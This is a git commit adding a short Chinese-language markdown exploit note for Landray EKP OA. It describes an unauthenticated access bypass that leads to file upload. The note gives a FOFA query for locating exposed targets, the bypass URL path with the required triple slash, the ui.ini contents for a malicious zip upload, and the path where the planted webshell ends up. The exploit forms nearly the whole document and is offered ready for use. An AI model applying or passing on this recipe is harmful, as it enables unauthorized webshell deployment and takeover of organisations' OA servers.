Create 蓝凌EKP前台授权绕过导致文件上传.md
This commit is contained in:
parent
8ceccb96e4
commit
eddef063cc
30
蓝凌EKP前台授权绕过导致文件上传.md
Normal file
30
蓝凌EKP前台授权绕过导致文件上传.md
Normal file
@ -0,0 +1,30 @@
|
|||||||
|
|
||||||
|
## 蓝凌EKP前台授权绕过导致文件上传
|
||||||
|
|
||||||
|
|
||||||
|
## fofa
|
||||||
|
```
|
||||||
|
app="Landray-OA系统"
|
||||||
|
```
|
||||||
|
|
||||||
|
访问路径/api///sys/ui/sys_ui_extend/sysUiExtend.do?method=upload其中路径需要api后面需要///不能变。
|
||||||
|
|
||||||
|
## poc
|
||||||
|
```
|
||||||
|
/api///sys/ui/sys_ui_extend/sysUiExtend.do?method=upload
|
||||||
|
|
||||||
|
```
|
||||||
|

|
||||||
|
|
||||||
|
|
||||||
|
## 文件上传
|
||||||
|
然后上传zip包需要有ui.ini文件内容如下
|
||||||
|
```
|
||||||
|
id=ZzzZname=testthumb=test
|
||||||
|
|
||||||
|
```
|
||||||
|

|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
马会在/resource/ui-ext/ZzzZ/jmdyy.jsp
|
||||||
Loading…
x
Reference in New Issue
Block a user